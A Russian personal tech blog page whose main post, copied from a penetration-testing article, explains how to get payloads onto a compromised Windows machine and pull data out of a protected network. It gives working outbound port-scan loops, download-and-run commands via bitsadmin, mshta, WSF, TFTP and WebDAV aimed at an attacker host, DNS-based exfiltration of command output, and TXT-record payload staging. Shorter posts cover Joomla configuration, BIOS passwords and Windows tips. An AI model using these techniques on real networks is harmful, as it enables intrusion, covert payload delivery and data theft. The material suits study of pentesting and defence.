24 дек. 2013 г.

Как вынести информацию из защищенной сети

Друзья огромня просба, если статья вам помогла кликните на рекламный банер... Зарание спасибо

Заливаем полезную нагрузку на машину под управлением Windows

Как правило, большие и средние компании строят свою внутреннюю инфраструктуру на решениях Microsoft. В основном это парк машин на XP/7, состоящих в домене с функциональным уровнем леса — Windows Server 2003. Периметр и демилитаризованные зоны часто представлены *nix-like системами. Во время проведения пентестов для таких компаний часто возникает классическая задача — перебросить файл с хоста на удаленную машину под управлением Windows. Наиболее распространенный случай — это RCE через уязвимость веб-приложения или ошибка в конфигурации сервисов. Не будем вдаваться в особенности реализации вектора атаки, а остановимся на задаче загрузки файла на целевую машину. Эта задача порой может отнять кучу времени, если не подготовиться как следует. Но мы-то готовы ко всему :). Даже тогда, когда в нашем распоряжении есть лишь минимальный набор инструментов, немногим варьирующий от версии к версии ОС, который позволяет в полной мере выполнить поставленную задачу.

Problem condition

В первую очередь давай определимся с ситуацией — она банальна и повседневна для пентестера :). Имеется некий вектор атаки, позволяющий выполнять команды ОС. Сервер может находиться на периметре, в демилитаризованной зоне или в интранете. Эти условия непринципиальны. Чтобы было проще, давай введем такие именования:
  • TARGET — машина, на которой имеем выполнение команд, на базе Windows, у нее только один сетевой интерфейс, смотрящий внутрь сети (192.168.1.10);
  • GATE — шлюз, который связывает внутреннюю сеть и интернет. Ось непринципиальна. Соответственно, на нем два сетевых интерфейса (192.168.1.1 и 5.5.5.5);
  • ATTACKER — наш подконтрольный сервер, на базе Bactrack 5r3 / Kali linux, с IP-адресом 1.2.3.4.

Firewall holes

Прежде чем начать передачу целевого файла, важно найти способ надежного соединения с узлом. Поиск прямых каналов связи на транспортном уровне с эксплуатируемым узлом (IP: 192.168.1.10) решается последовательным перебором портов на контролируемом сервере (IP: 1.2.3.4). Из стандартного инструментария можем воспользоваться Telnet, nslookup, PowerShell. Telnet и nslookup целесообразно использовать в версиях до Windows 2003 включительно, а начиная с Windows Vista рекомендуется использовать PowerShell. В принципе, если бы не досадная ошибка в nslookup, у нас мог бы быть универсальный инструмент для всех версий Windows. Очевидный факт: если в системе нет Telnet, то там есть PowerShell.

Неправильная конфигурация сетевого экрана
Неправильная конфигурация сетевого экрана
Для того чтобы понять, когда именно к нам придет подключение, запустим покорный tcpdump:
tcpdump host 5.5.5.5
В свою очередь, будем пробовать подключаться к нашему внешнему серверу с машины, на которой у нас выполнение команд. Для версий Windows <= Windows 2003 TCP-порты FOR /L %i IN (1,1,65535) DO (cmd /c "start /b telnet 1.2.3.4 %i") UDP-порты FOR /L %i IN (1,1,65535) DO (cmd /c "start /b nslookup -port=%i ya.ru 1.2.3.4")
Для Windows Vista и более поздних версий винды будем использовать PowerShell.
Для TCP-портов:
function sT($IP,$Port) {$Address = [system.net.IPAddress]::Parse($IP);$End = New-Object System.Net.IPEndPoint $address, $port;$Saddrf = [System.Net.Sockets.AddressFamily]::InterNetwork;$Stype = [System.Net.Sockets.SocketType]::Stream;$Ptype = [System.Net.Sockets.ProtocolType]::TCP;$Sock = New-Object System.Net.Sockets.Socket $saddrf, $stype, $ptype;$Sock.TTL = 26;try { $sock.Connect($End);[Byte[]] $Message = [char[]]"w00tw00t";$Sent = $Sock.Send($Message);$sock.EndConnect($Connect)} catch {};$Sock.Close();};1..65535 | %{ sT -IP "1.2.3.4" -Port $_ }
Для UDP-портов:
function sU($IP, [int]$Port){$Address = [system.net.IPAddress]::Parse($IP);$End = New-Object System.Net.IPEndPoint($Address, $port);$Saddrf=[System.Net.Sockets.AddressFamily]::InterNetwork;$Stype=[System.Net.Sockets.SocketType]::Dgram;$Ptype=[System.Net.Sockets.ProtocolType]::UDP;$Sock=New-Object System.Net.Sockets.Socket $saddrf, $stype, $ptype;$Sock.TTL = 26;$sock.Connect($end);$Enc=[System.Text.Encoding]::ASCII;$Message = "w00tw00t";$Buffer=$Enc.GetBytes($Message);$Sent=$Sock.Send($Buffer);}; 1..65535 | %{ sU -IP "1.2.3.4" -Port $_ }
Естественно, куски этого кода необходимо заэнкодить в Base64, после чего передавать полученное значение как аргумент к команде PowerShell с параметром -encodedCommand.
Также стоит упомянуть о таком проекте, как letmeoutofyour от @mubix для проверки доступных каналов во внешнюю сеть. На любой HTTP-запрос отвечает w00tw00t.

FTP

Признан самым распространенным способом загрузки целевого файла и вообще является одним из старейших протоколов прикладного уровня. Основные достоинства загрузки через FTP — простота использования и наличие приложения во всех версиях систем. Если хост находится за NAT, то в большинстве случаев необходимо использовать режим работы passive mode, иначе сервер не сможет подключиться к клиенту. Существуют реализации расширений для NAT и сетевых экранов, позволяющие клиентам работать в активном режиме, но это большая редкость и небезопасно. Стандартная функциональность позволяет указать любой порт удаленного сервера.

TFTP

Клиент TFTP реализован во всех версиях семейства Windows, но начиная с версии Windows Vista отключен и не доступен по умолчанию. Особенность TFTP — он основан на транспортном протоколе UDP. Зачастую при полной фильтрации TCP удается передать файл по UDP. Достаточно запустить сервис
atftpd --daemon --port 69 /tmp
и выполнить на клиенте последовательность простых команд
dism /online /enable-feature /featurename:TFTP
tftp –i 1.2.3.4 GET payload.exe

Telnet

Клиент Telnet также реализован во всех версиях семейства Windows и также отключен и недоступен начиная с версии Windows Vista. Задумывалось, что Telnet будет использоваться для работы с протоколами уровня приложений. Клиент тоже поддерживает работу на транспортном уровне, правда с некоторыми особенностями, для нас не важными. Использование клиента Telnet в качестве транспорта для бинарных файлов невозможно из-за специфики протокола (более подробно в RFC854 про ). Поэтому без потерь можно передавать файлы, содержащие стандартный набор ASCII-символов.
На сервере запустим netcat, который будет передавать содержимое нашего файла: nc -q 20 -lvp 23 < evil.bat
На клиенте же, в свою очередь, заэнейблим Telnet, если он отключен:
dism /online /enable-feature /featurename:TelnetClient
и таким нехитрым способом подключимся к серверу и сохраним в файл то, что он нам передал:
mode CON COLS=200000 && telnet 172.16.61.21 -f c:\command.bat
mode CON COLS=200000 устанавливает количество колонок (читай — символов), после которого клиент Telnet добавит символы . В принципе, если максимальная длина не превышает настроек lines, то можно специально не задавать.

Стандартные настройки
Стандартные настройки
Ключ –f клиента Telnet позволяет записывать stdin сессии в указанный файл. Кстати, так же можно использовать в *nix, если в наличии нет доступного инструмента. Обязательное условие успешной эксплуатации наличие символов в конце строки. Быстро сконвертировать файл, созданный в *nix, можно командой
unix2dos evil.bat

SAMBA

Samba — свободное ПО, в серверной части которого реализована работа с протоколом SMB/CIFS. CIFS — протокол уровня приложений для работы с файловой системой по сети. Рассмотрим ситуацию, когда невозможно получить вывод команд, команды выполняются от непривилегированного пользователя, нет доступной для записи директории. В этом случае целесообразно установить на контролируемом сервере (IP: 1.2.3.4) службу Samba, настроить гостевую аутентификацию и разрешить запись в директорию.

Монтирование удаленного ресурса
Монтирование удаленного ресурса
Конфигурируем (/etc/samba/smb.conf) и запускаем Samba:
[global]
  workgroup = WORKGROUP
  security = share
  netbios = TEST
  server string = %h server (Samba, Ubuntu)
[share]
  comment = File Server Share path = /tmp/share browsable = yes writable = yes guest ok = yes read only = no create mask = 0755\`
и запускаем сервис:
sudo service smbd start
После чего монтируем только что созданный ресурс как диск
net use X: \1.2.3.4
и копируем необходимый файл
copy X:\payload.exe C:\payload.exe

Windows Script Host

Что это вообще такое? WSH — автономный сервер, предназначенный для выполнения сценариев на уровне ОС. Является встроенным компонентом и присутствует во всех версиях начиная с Windows 2000. По умолчанию интерпретирует два типа сценариев. Первый тип — автономные сценарии, реализованные на языках VBScript/JScript. Как правило, файлы сценариев имеют расширения vbs, vbe и js, jse соответственно. Второй тип — файлы wsf (Windows Script File). Это текстовый документ, содержащий код XML.

VBScript/JScript

Cкриптовые объектно-ориентированные языки программирования, интерпретируемые сервером Windows Script Host. Серверов, кстати, два: cscript — консольный и wscript — интерактивный. Сервер по умолчанию — wscript. Эти языки создавались для автоматизации рутинных действий, администрирования и обработки данных. Для доступа к элементам системы используют COM (Component Object Model). Кстати, если соберешься написать что-нибудь, при прочих равных условиях выбирай JScript, так как он имеет приятный легко читаемый синтаксис и поддерживается многими IDE. К сожалению, передать скрипт как аргумент серверу WSH нельзя. Обязательно нужно указывать путь к сценарию. Процедура, реализующая получение файла с HTTP/HTTPS:
function HTTPGetDownload(url, file) {
  // create an HTTP object     var http = new ActiveXObject("WinHttp.WinHttpRequest.5.1");     // download the specified URL     http.open("GET", url);     http.send();
  var stream = new ActiveXObject("ADODB.Stream");     stream.type = 1;     stream.open();     // write the downloaded byte stream to the target file     stream.write(http.responseBody);     stream.saveToFile(file,2); }
  HTTPGetDownload("http://1.2.3.4/payload.exe", "payload.exe");

Windows Script File

Сценарии WSF могут одновременно содержать JScript- и VBScript-сценарии. Это сделано для того, чтобы увеличить гибкость написания кода, а также обеспечить модульность и повторное использование кода.

Windows Script File в работе
Windows Script File в работе
Вот несколько набросков, которые реализуют передачу файла с различных ресурсов:
> HTTP/HTTPS
<job><script language="VBScript" src="http://1.2.3.4:80/payload.vbs"></script></job>

> FTP
<job><script language="VBScript" src="ftp://1.2.3.4:21/payload.vbs"></script></job>

> UNC
<job><script language="VBScript" src="\1.2.3.4\payload.vbs"></script></job>
На просторах Сети добрый китайский коллега zzzEVAzzz реализовал скрипт Any2Bat — любой файл путем преобразований можно сконвертировать в bat. Логика работы проста: создается файл архив cab, преобразуется в Base64 и оборачивается в WSF. В WSF содержится VBScript, который читает себя как XML (как ранее было отмечено, WSF описывается XML), берет первый элемент и сохраняет содержимое в cab. Полученный WSF преобразуется в bat путем добавления к каждой строке
@echo … > payload.wsf
На основе скрипта zzzEVAzzz была реализована версия на PowerShell. Теперь можно конвертировать целевой cab в WSF или bat. Ее ты сможешь найти на нашем диске.

MHTA

Mshta.exe (Microsoft HTML Application Host) — служебная программа для выполнения HTA (HTML Applications). HTA — это HTML-страница, которая имеет доступ к ресурсам системы через COM, выполняя скрипты JScript/VBScript. В принципе, это полноценный Internet Explorer, только без зон безопасности. Таким образом у нас есть возможность изменять реестр, работать с файлами и сетью. Утилита принимает один параметр командной строки — то, что попадет в browser address bar. Поэтому мы можем передать ссылку на HTA или скриптовый блок. Расширение не имеет значения.
Выполняем VBScript/JScript, расположенный на удаленном хосте:
mshta http://1.2.3.4:80/payload.vbs mshta https://1.2.3.4:443/payload.vbs mshta ftp://1.2.3.4:21/payload.vbs mshta \1.2.3.4\payload.vbs
Выполняем VBScript/JScript как аргумент запуска команды:
mshta vbscript:Execute("WScript.Echo 1")  mshta javascript:Execute('WScript.Echo(1);')

WebDAV

Протокол прикладного уровня, расширяющий возможности протокола HTTP/HTTPS для удаленной работы с файлами. Начиная с версии Windows XP клиент WebDAV реализован в виде службы WebClient. Серверная часть представлена, как правило, расширениями для Apache и IIS. WebDAV, так же как и SMB/CIFS, решает задачу с поиском папки для записи — расширение дискового пространства с правами на запись для группы «Все». По сравнению с SMB/CIFS применение WebDAV в некоторых случаях более гибкое, так как поддерживает работу по HTTP. Начиная с версии Windows XP SP3, а именно предустановленного апдейта KB892211, появляется поддержка SSL и возможность выбора произвольного порта. Более ранние версии WebDAV mini-redirector поддерживают работу исключительно по HTTP и 80-му порту. В корпоративных средах повсеместно распространена практика использования прокси-серверов в качестве шлюза в интернет. В тех случаях, когда другие способы не работают — нет поддержки прокси-сервера, целесообразно использовать WebDAV.

Proxy settings

Давай рассмотрим тему настройки прокси-сервера для пользователя. С точки зрения системного администрирования существуют четыре возможных сценария предоставить пользователю настройки прокси-сервера:
  • WPAD;
  • PAC;
  • Group policy;
  • User choice.

WPAD

Web Proxy Auto-Discovery Protocol используется, если в настройках браузера активна Automaticly detect setting.

Настойка Web Proxy Auto-Discovery Protocol
Настойка Web Proxy Auto-Discovery Protocol
Настраивается соответствующими записями на серверах DNS или DHCP. При получении настроек через DNS должно соблюдаться условие публикации файла: только HTTP, только 80-й порт. В DHCP может использоваться любой порт. Если ты смотришь на URL настроек WPAD и там используется нестандартный порт, то знай, что настройки получены по DHCP ;).
Например, компьютер находится в домене r1.d2.phdays.com. В поисках файла настройки браузер последовательно обращается к таким URL:
http://wpad.r1.d2.phdays.com/wpad.dat http://wpad.d2.phdays.com/wpad.dat http://wpad.phdays.com/wpad.dat http://wpad.com/wpad.dat (OOOOPS!)

PAC

Proxy auto config — на практике WPAD — это и есть переименованный файл с PAC. Если посмотреть код, то обнаружишь там JavaScript-функцию FindProxyForURL, которая возвращает адрес прокси-сервера в зависимости от запрашиваемого хоста.

Group policy

Групповыми политиками назначают PAC или отдельно прокси-сервер для протокола.

User choice

Прокси-сервер не назначается администратором домена.

Dig deeper

Рассмотрим такую ситуацию: успешная эксплуатация хоста -> привилегии NT AUTHORITY\SYSTEM -> прокси-сервер настроен у пользователя. Следующим шагом необходимо узнать адрес прокси-сервера. Вполне логично предположить, что пользователей может быть несколько с различными прокси-серверами, в зависимости от групповых политик. Возникает резонный вопрос: каким образом можно получить вывод исполнения команды? Стоит отметить, что сетевые настройки общие для системы, в том числе DNS. А в большинстве случаев внутренний DNS является авторитативным и сам разрешает доменные имена в IP-адреса. Таким образом, имея подконтрольный DNS-сервер с настроенным логированием, отвечающий за нашу зону, мы cможем просматривать вывод команд.
Реализуется это следующим образом:
FOR /F %I IN ('ipconfig /all') DO nslookup %I.ya.ru 1.2.3.4 mshta "javascript:function h(out){hxd='';for(a=0;a<out.length;a=a+1){hxd=hxd+out.charCodeAt(a).toString(16);}return hxd;}function r(cmd){var shell=new ActiveXObject('WScript.Shell');var se=shell.Exec(cmd);var out = '';while(!(se.StdOut.AtEndOfStream)){out=out+se.StdOut.ReadLine();}return out;}function ex(cmd){var out=h(r(cmd));query=out.match(/.{1,60}/g);for(v=0;v '+v+'x'+query[v]+'.ya.ru')};}function e(){ex('proxycfg');}window.onload=e" 
Если у нас привилегии пользователя, то настройки прокси можно посмотреть так:
**Windows Vista (system proxy)**
netsh winhttp show proxy

**Windows Vista (IE proxy)**
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer`

**Windows XP & 2003 (IE proxy)**
netsh diag connect ieproxy

**Windows XP & 2003 (system proxy)**
proxycfg

Установка настроек прокси-сервера:

**Windows Vista (system proxy)**
netsh winhttp set proxy proxy:3128

**Windows Vista (IE proxy)**
Set-ItemProperty 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -name ProxyEnable -value 1 Set-ItemProperty 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -name ProxyServer "proxy:3128"

**Windows XP & 2003 (IE proxy)**
proxycfg –p proxy:3128

**Windows XP & 2003 (system proxy)**
proxycfg -U

WebDAV

Шаги для установки WebDAV на Apache.
Энэйблим модуль WebDAV
a2enmod dav_fs a2enmod dav /etc/init.d/apache2 restart 
Настраиваем WebDAV
mkdir -p /var/www/web/ chown www-data /var/www/web/

vim /etc/apache2/sites-available/default NameVirtualHost * \<VirtualHost *\> ServerAdmin webmaster@localhost DocumentRoot /var/www/web/ [Directory /var/www/web/][] Options Indexes MultiViews AllowOverride None Order allow,deny allow from all </Directory> Alias /webdav /var/www/web/ [Location /webdav][] DAV On </Location> </VirtualHost>

/etc/init.d/apache2 reload
Готово! Теперь можно использовать наш уютный сервис с удаленной машины :). Например, существует множество способов примонтировать свежеиспеченный ресурс:
net use x: http://1.2.3.4/webdav net use x: https://1.2.3.4/webdav /user:Guest Guest net use x: \1.2.3.4\webdav net use x: \1.2.3.4@SSL@53\webdav net use x: \1.2.3.4@53\webdav
После чего, удачно смонтировав ресурс, копируем необходимый файл командой copy :)
copy X:\payload.exe C:\payload.exe

nslookup

Nslookup является средством администрирования на основе командной строки и предназначена для проверки работоспособности DNS-серверов. Имеет два режима работы: интерактивный и консольный. Если нет возможности установить TCP-соединение с подконтрольным сервером, то можно использовать внутренний DNS для обмена данными с сетью. В 2008 году Кевин Бонг (Kevin Bong) рассмотрел и реализовал способ создания неинтерактивного шелла через опрос TXT записей (bit.ly/14aJGyM). Максимальная длина txt — 255 символов. Все кавычки в записи должны быть экранированы.

Так как вывод nslookup не содержит исполняемых команд, можно сделать проще и короче: заэкранировать обязательные обрамляющие кавычки и записывать вывод в bat.
Правим запись txt для подконтрольного домена (c1.attacker.com):
" & @echo ^<package^>^<cab xmlns:dt=\"urn:schemas-microsoft-com:datatypes\" dt:dt=\"bin.base64\"^> >payload & "
После чего на клиенте запускаем nslookup и перенаправляем вывод в файл:
nslookup -type=TXT c1.attacker.com >> payload.bat & payload.bat

PowerShell

Это фреймворк, созданный Microsoft, для автоматизации задач системного администрирования. Имеет CLI, подобный CMD, со встроенной поддержкой и интеграцией .NET Framework. Разработка началась в 2002 году под названием Monad. Первая RC-версия появилась в 2006 году и была переименована в Windows PowerShell. C выходом Windows Vista SP1 поставляется как компонент ОС. Windows 8/2012 поставляется с третьей версией, значительно расширенной командлетами. Windows 7/2008 поставляется со второй версией.
PowerShell — это такой слой абстракции, который делает удобной работу с компонентами системы: COM, WMI, ADSI. В результаты мы имеем простой унифицированный способ управления системой локально или удаленно.
Функциональность PowerShell обеспечивается командлетами — специальными командами, реализующими конкретный функционал. Например, командлет Get-Content или gc или cat — получить содержимое файла. gc и cat алиасы командлета Get-Content. При написании командлетов принято придерживаться именования verb-noun. Результат командлета — это объект или коллекция. Примеры кода, реализующего слив файла, ты найдешь на нашем диске.

bitsadmin

Wget для Windows :). Этим все сказано.
Параметры запуска достаточно просты:
bitsadmin /transfer whatever http://1.2.3.4:80/payload.exe c:\payload.exe
Или же можно создать целую задачу для загрузки серии файлов с удаленного ресурса:

bitsadmin /CREATE /DOWNLOAD jobname bitsadmin /ADDFILE jobname http://1.2.3.4/payload1.exe p1.exe bitsadmin /ADDFILE jobname http://1.2.3.4/payload2.exe p2.exe bitsadmin /RESUME jobname bitsadmin /COMPLETE jobname

WWW

Вместо заключения

В своей статье я постарался подробно прояснить ситуацию с загрузкой файлов на машины за NAT’ом. Надеюсь, что это хорошая отправная точка для дальнейшего ресерча и изучения множества других клевых «хаков». Если у тебя остались вопросы или комментарии, я с радостью на них отвечу. Удачного тебе закрепления на удаленной машине! Stay tuned!

Статья скопирована целиком отсюда

разберем configuration.php

Друзья огромня просба, если статья вам помогла кликните на рекламный банер... Зарание спасибо

При перемещениях или других действиях с сайтом под управлением Joomla частенько требуется решить небольшие проблемы с настройкой путей, паролей, базы данных и других основных моментов конфигурации. Большая часть таких вопросов легко решается прямым редактированием файла конфигурации configuration.php.
Данный урок предназначен помочь владельцам сайта под управлением Joomla разобраться с конфигурацией и назначением различных параметров. Вы узнаете:
  • Где находится файл configuration.php на сайте.
  • Как влияет значение установок на работу системы.
Урок содержит только общие сведения и не может быть использован в качестве полноценного руководства. Наша задача - дать общее представление и помочь понять, где искать причины и возможные решения различных проблем.

Где находится файл configuration.php

Место             расположения файла configuration.php
На рисунке представлено расположение файла, которое демонстрируется в Filezilla. Установка сайта была выполнена в каталог "joomla" .
Файл configuration.php располагается в корневом каталоге с установленной Joomla.
Прежде чем приступить к изменению файла обязательно надо сделать резервную копию. Изучение материала лучше всего проводить на тестовом проекте.

Установки сайта

Установки               сайта
  • $offline : значение "0" включает сайт, значение "1" - отключает.
  • $offline_message : сообщение, которое выводится при отключенном сайте.
  • $sitename : имя сайта, которое выводится в заголовках.
  • $editor : редактор, который используется по умолчанию.
  • $list_limit : длина списка в панели управления для всех пользователей. По умолчанию: 20.
  • $access : уровень доступа на сайт по умолчанию: "1" - открытый доступ для всех; "2" - ограниченный доступ; "3"  - специальный режим.

Установки отладки

Установки                 отладки
  • $debug : "0" - отладка отключена; "1" - отладка включена. При включенной отладке система выдает различные информационные сообщения о работе системы и ошибках вверху страницы.
  • $debug_lang : "0" - выключено; "1" - включено. Включение отладочных индикаторов (*...*) или (?...?) для языковых файлов Joomla.

Установки базы данных

Установки базы данных
  • $dbtype : "mysqli" или "mysql". Тип используемой базы данных.
  • $host : "localhost" для большинства серверов. Конкретное значение может зависеть от требований хостера.
  • $user : имя пользователя базы данных.
  • $password : пароль пользователя базы данных.
  • $db : имя используемой базы данных.
  • $dbprefix : минимум три символа, завершающихся подчеркиванием (определяется при установке Joomla).

Дополнительные опции

Дополнительные опции
  • $live_site : адрес URL сайта. В последних версиях данная опция не должна иметь значения. Но в случаях перенаправлений или работы с копиями сайта здесь нужно указывать URL сайта-оригинала.
  • $secret: НЕ ИЗМЕНЯТЬ. Значение генерируется при установке Joomla и используется для обеспечения безопасности.
  • $gzip : "0" - отключено; "1" - включено. Архивирование.
  • $error_reporting : уровень подробности отчета об ошибках. Чем выше уровень, тем больше различных ошибок будут генерировать сообщения, записываемые в журнал, что может привести к трате дискового пространства.
  • $helpurl : адрес страниц помощи. По умолчанию указывается официальная страница помощи по Joomla.
Дополнительные опции
  • $ftp_host: : IP адрес локального хоста FTP. Сервер хостера может иметь отличное значение от 127.0.0.1.
  • $ftp_port : номер порта для FTP. Сервер хостера может иметь отличное значение от 21.
  • $ftp_user : имя пользователя для FTP.
  • $ftp_pass : пароль пользователя для FTP.
  • $ftp_root: : путь корневой папки для FTP (обычно, имеет вид /home/username/public_html).
  • $ftp_enable : Указывает Joomla использовать встроенные функции FTP вместо обработки через PHP.

Установки временной зоны

Устанвоки временнной зоны
  • $offset : временная зона сервера.
  • $offset_user : временная зона пользователя

Установки почты

Установки почты
  • $mailer : "mail" - используем функцию PHP для работы с почтой; "sendmail" - используем сервер SMTP.
  • $mailfrom : адрес email, который использует Joomla! для отправки почты.
  • $sendmail : путь, по которому располагается программа Sendmail. Данная опция используется только если $mailer имеет значение "sendmail".
  • $smtpauth : если на сервере SMTP требуется аутентификация, то нужно установить значение '1'. Данная опция используется только если $mailer имеет значение "sendmail".
  • $smtpuser : имя пользователя для доступа к серверу SMTP. Данная опция используется только если $mailer имеет значение "sendmail".
  • $smtppass: пароль для доступа к серверу SMTP. Данная опция используется только если $mailer имеет значение "sendmail".
  • $smtphost : адрес SMTP сервера. Данная опция используется только если $mailer имеет значение "sendmail".
  • $smtpsecure : модель безопасности на сервере SMTP. Доступны значения 'SSL' и 'TTL'.
  • $smtpport : порт SMTP. Большинство серверов для незащищенного соединения используют порт 25, а для защищенного - порт 465. Конкретное значение нужно узнать у хостера.

Установки журнала

Установки журнала
  • $log_path : путь, по которому хранится журнал системы.
  • $tmp_path : путь, по которому хранятся временные файлы системы. Правильное значение данной опции критично для системы.

Установки кеша

Установки кеша
  • $caching : "0" - выключено, "1" - консервативное кеширование; "2"  - прогрессивное кеширование.
  • $cache_handler : "file" - полное кеширование; "cachelite"  - частичное кеширование.
  • $cachetime : время (минут) хранения файла кеширования до его обновления.

Установки метаданных

Установки метаданных
  • $MetaDesc : текстовое описание сайта для целей SEO.
  • $MetaKeys : ключевые слова, разделенные запятой.
  • $MetaAuthor : "0" - скрывать информацию об авторе; "1"  - выводить мета тег.

Установки для SEO

Установки для SEO
  • $sef : "0" - отключено, "1" - включено. Модификация адресов URL в более подходящий для целей SEO вид. Например, адрес www.example.com/index.php?option=com_content&view=etc... трансформируется в www.example.com/псевдоним.
  • $sef_rewrite : 0" - отключено, "1" - включено. использовать установки mod_rewrite сервера Apache для создания модифицированных адресов.
  • $sef_suffix : 0" - отключено, "1" - включено. Добавление .html в конец адреса URL.
  • $unicodeslugs : 0" - отключено, "1" - включено. Выбор между форматом псевдонимов в транслитерации или юникоде.
  • $feed_limit : ограничение на количество фидов.


Установки сессии

Установки сессии
  • $lifetime : длительность сессии в минутах. Определяет время, которое пройдет до отключения пользователя, который не проявляет активности.
  • $session_handler : "database" или "none". Определяет обработку сессии после подключения пользователя.
  •  
Украдено тут

Администрирование сайта

Друзья огромня просба, если статья вам помогла кликните на рекламный банер... Зарание спасибо

Руководство предложило мне взять на себя  администрирование сайтом организации.

Тут встало несколько вопросов:

1. Администрирование Jooomla;
2. Поднять тестовый сайт в локальной сети.

Планирую в ближайшее время описать и то и другое.

22 дек. 2013 г.

Для чего я пишу Блог???

Для чего я пишу Блог???
Все очень просто. Компьютер это безумно интересное и сложное, разносторонние устройство.
Тут много чего интересного, и именно это интересное я и публикую в своем блоге, для того что бы не забыть.
То здесь я аккумулирую свои, и чужие знания  в области компьютерных систем. И мне будет очень приятно если это поможет кому то еще...
Читайте друзья мне приятно видеть что моя работа помогает еще кому то.

беспроводной интернет в Москве.

Друзья огромня просба, если статья вам помогла кликните на рекламный банер... Зарание спасибо

Во Времена скоростного Интернета, средняя скорость у меня была 8 Мб/c, я вынужден был переехать в новую квартиру, и тут, Интернета нет вообще!!! И это в Москве...
Встал вопрос по выбору беспроводного интернета...

Выбор:
1. Билайн
2. МТS
3. Мегафон
4. Yota
В ближайшее время планирую разобраться, хоть частично в этом вопросе, так же у меня появляется проблема, в согласовании современных модемов беспроводной связи с моими Linux системами.  Нашел погуглив статью как заставить yotu работать в Linux.

20 дек. 2013 г.

ускорить процесс загрузки/выключения компьютера.

Друзья огромня просба, если статья вам помогла кликните на рекламный банер... Зарание спасибо

Как ускорить процесс загрузки/выключения компьютера.
(Этот способ актуален только для многоядерных компьютеров)

По умолчанию, при загрузке, операционная система задействует лишь одно ядро процессора.
Остальные в это время простаивают. Чтобы их тоже задействовать сделайте маленькую настройку.

Вызовете команду "Выполнить" с помощью сочетания клавиш Win + R или же перейдя в Пуск —> Все программы —> Стандартные —> Выполнить.
В поле "Открыть" введите команду msconfig и нажмите Enter. Откроется окно "Конфигурация системы", в котором переходите во вкладку "Загрузка".

На этой вкладке нажимаете кнопку "Дополнительные параметры...". Откроется окно в котором как указано на картинке установите галочку на против "Число процессоров" и чуть ниже выбираете количество процессоров, которые будут задействованы в загрузке Windows.

Желательно выбирать максимальное количество, которое есть у вашего компьютера и загрузка Windows на вашем компьютере будет происходить быстрее.


Групповое переименование файлов

Друзья огромня просба, если статья вам помогла кликните на рекламный банер... Зарание спасибо

Операционная система Windows 7 поддерживает групповое переименование файлов. Для того чтобы это реализовать выделите группу файлов в проводнике и нажмите клавишу F2 далее задайте имя первому файлу, и вся группа файлов будет названа этим именем + порядковый номер файла в скобочке.

Как сделать невидимую папку на рабочем столе?

Друзья огромня просба, если статья вам помогла кликните на рекламный банер... Зарание спасибо

Как сделать невидимую папку на рабочем столе?

Для тех, кому есть, что спрятать от посторонних глаз эта информация будет полезна. В эту папку можно складывать секретный материал, держать ее на рабочем столе и никто не увидит ее у вас, ведь она будет невидмая

Инструкция:
Создаём на рабочем столе новую папку.
Выбираем пункт "Переименовать" —--> зажимая клавишу "Alt" и удерживая её нажатой, жмём по очереди цифры 2 5 5 (Обязательно жать их на дополнительной цифровой клавиатуре, которая расположена справа!)
Теперь папка не имеет названия, но её всё ещё видно
Заходим в "Свойства" папки
Далее "Настройка" —--> "Сменить значок" и находим прозрачную иконку, нажимаем "Ок"
О чудо! Папка исчезла!
Теперь можете скидывать в " пустоту" всё что угодно и никто об этом не узнает.

Хитрости жизни - Полезные советы, упрощающие жизнь

Пароль на BIOS

Друзья огромня просба, если статья вам помогла кликните на рекламный банер... Зарание спасибо

Задание пароля AWRD BIOS

Для начала рассмотрим как задается пароль в BIOS производства Award. При загрузке компьютера необходимо нажать клавишу Delete, после чего можно выбирать один из двух вариантов задания пароля:

Set User Password (Установить пароль пользователя). Он может задаваться либо на вход в меню Setup Bios, либо на вход в Setup загрузку компьютера. Для того чтобы выбрать любой из вышеперечисленных методов блокровки, необходимо в меню Advanced BIOS Features выбрть строку Password Check. Затем после нажатия клавиши Enter в появившемся окне следует выделить либо Setup (т.е. пароль только на Setup BIOS), либо System (т.е. пароль на загрузку системы и Setup BIOS);

Set Supervisor Password (Установить пароль супервизора). Имеет приоритет перед паролем пользователя. Все остальные функции и настройки такие же, как и у User Password.

Задание пароля AMI BIOS

Вызов окна настроек AMI BIOS осуществляется нажатием клавиши F2 в процессе тестирования оборудовния после включения компьютера. Здесь для задания пароля необходио выбрать вкладку Security, в которой доступны Set Supervisor Password и Set User Password. Харктерной особенностью AMI BIOS яляется то, что пользователь, знающий Supervisor Password, может ограничивать возможности пользователей, знающих только User Password.
Для того чтобы задать пароль, необходимо подсветить желаемый тип пароля. После нажатия клавиши Enter отобразится окно с двумя полями: в первое поле необходимо ввести свой пароль, а во вором - продублировть его.

Как перенести Windows XP и Windows 7 на USB флешку

Друзья огромня просба, если статья вам помогла кликните на рекламный банер... Зарание спасибо

Перенос Windows

Если на Вашем ноутбуке или нетбуке отсутствует или не работает дисковод (иногда он может быть поломан и на домашнем компьютере), это не значит, что на него нельзя установить Windows, причем любую версию ... пусть даже самую свежую Windows 7

Установка Winodws с флэшки - довольно нетривиальная задача, которую было раньше принято решать с помощью утилит командной строки, да еще и на английском или не дай бог немецком языках.

Довольно недружественная среда, не правда ли? И столько мук для того, чтобы установить операционную систему на свой свежекупленный нэтбук.



Переносим Windows 7 на USB накопитель

Novicorp WinToFlash решает все проблемы разом - понятный и простой интерфейс, русский язык в меню и подсказках, мастер, с которым даже ребенок справится!

Подробнее о программе WinToFlash, там же Вы узнаете где скачать программу wintoflash бесплатно на русском языке.

Что может WinToFlash? Вот скриншот меню расширенного режима:

Да, о режимах. Тут их два - для детей (мастер) и для бородатых дядей (расширенный). Режим для дядей не просто так я назвал - я не сразу понял, за что отвечает добрая половина параметров.

Можно очень и очень тонко настроить параметры форматирования и переноса Windows. Мастер же, задава всего 2 вопроса, все сделает сам, и скорее всего, у вас все загрузится и начнет устанавливаться.

Итак, качаем с официального сайта http://WinToFlash.com/home/ru последюю версию, распаковываем. Она portable и поставляется в zip архиве. Запускаем WinToFlash.exe, в семерке еще попросят права администратора подтвердить.

Кликните большую зеленую кнопку, чтобы его запустить.

Нажмем далее и укажем, путь к файлам Windows и к флэшке.

ISO образы пока не поддерживаются, распакуйте их перед операцией.

Потом принимаем лицензию и форматируем нашу флешку

Через минут 20 процесс завершиться, скорость зависит только
